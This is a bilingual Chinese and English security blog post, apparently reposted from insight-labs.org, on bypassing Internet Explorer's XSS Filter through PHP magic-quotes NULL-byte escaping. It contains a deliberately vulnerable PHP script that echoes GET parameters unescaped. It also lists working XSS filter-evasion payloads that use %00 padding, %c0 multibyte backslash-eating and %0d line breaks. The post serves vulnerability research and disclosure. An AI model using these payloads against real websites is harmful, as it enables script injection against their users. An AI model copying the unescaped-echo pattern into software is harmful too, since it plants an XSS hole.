作者/Sogili(@jackmasa)

首发/Insight-labs.org

在一些web容器中会对一些特殊字符做转换处理,这中间ie xss filter开发人员任何地方对它的了解有疏忽,都很可能导致bypass.

在php中,如果开启了”魔术引号”特性(magic_quotes_gpc = On),则 (single-quote), (double quote), \ (backslash) 和 NULL 字符将都会被反斜杠转义(%00 =>\0).

通过一些测试,我发现ie xss filter对NULL字符的转义处理并不感冒,意思是它并不了解这种转换过程.

1. xss.php demo source code: 

<?php echo $_GET['x']?>
<script type="text/javascript">
var x="<?php echo $_GET['z']?>"
</script>

2. HTML bypass case: 

<script>alert(1)</script>
<script/%00%00%00%00%00>alert(1)</script>
%00%00v%00%00<script>alert(1)</script>
<script/%00%00v%00%00>alert(1)</script>

PHP 魔术引号导致 IE XSS Filter bypass

tips:

1. 绕过字符必须出现在拦截规则中,例如拦截<script>就可以是<script [here]>.

3. Javascript bypass case: 

“;alert(1)//
%c0″;alert(%00)//
%c0″;//(%0dalert(1)//
%c0″;//(%0dalert(1)//
%c0″;//(%00%0dalert(1)//
%c0″//(%000000%0dalert(1)//

PHP 魔术引号导致 IE XSS Filter bypass

tips:

1. 需要通过多字节问题吃掉一个\.

2. //(%000000%0d是用于绕过函数调用的拦截规则.

如果你有更多的想法或者小技巧,欢迎与我联系交流@jackmasa

####English Version:

Author/Sogili(@jackmasa)

Post/Insight-labs.org

Basically some special characters in the web container to do the conversion process,if developers mistake concept in the process,it might be bypass IE XSS Filter.

In PHP, if website enable magic_quote_gpc = On in php.ini , as we known (single-quote), (double quote), \ (backslash) and NULL characters are backslash as an escape (%00 => \0).

For my pentesting of the bypass IE Xss Filter, I feel the IE developers are don’t interest in IE Xss Filter against NULL characters are backslash ( \ ) escape character, I mean they aren’t depthly understanding of the conversion process.

1. xss.php demo source code: 

<?php echo $_GET['x']?>
<script type="text/javascript">
var x="<?php echo $_GET['z']?>"
</script>

2. HTML bypass case: 

<script>alert(1)</script> :(
<script/%00%00%00%00%00>alert(1)</script>
%00%00v%00%00<script>alert(1)</script> :(
<script/%00%00v%00%00>alert(1)</script> :D

PHP 魔术引号导致 IE XSS Filter bypass

tips:

1.bypass the characters must be appears in intercept rules of IE Xss Filter , for example: intercept <script> also can be <script [here]>.

3. Javascript bypass case: 

“;alert(1)//
%c0″;alert(%00)//
%c0″;//(%0dalert(1)//
%c0″;//(%0dalert(1)//
%c0″;//(%00%0dalert(1)//
%c0″//(%000000%0dalert(1)//

PHP 魔术引号导致 IE XSS Filter bypass

tips:

1.Need through multi-byte problem close a backslash ( \ )

2. //(%000000%0d is used to bypass the function intercept rules.

Feel free to contact me with@jackmasa

转自:http://insight-labs.org/?p=499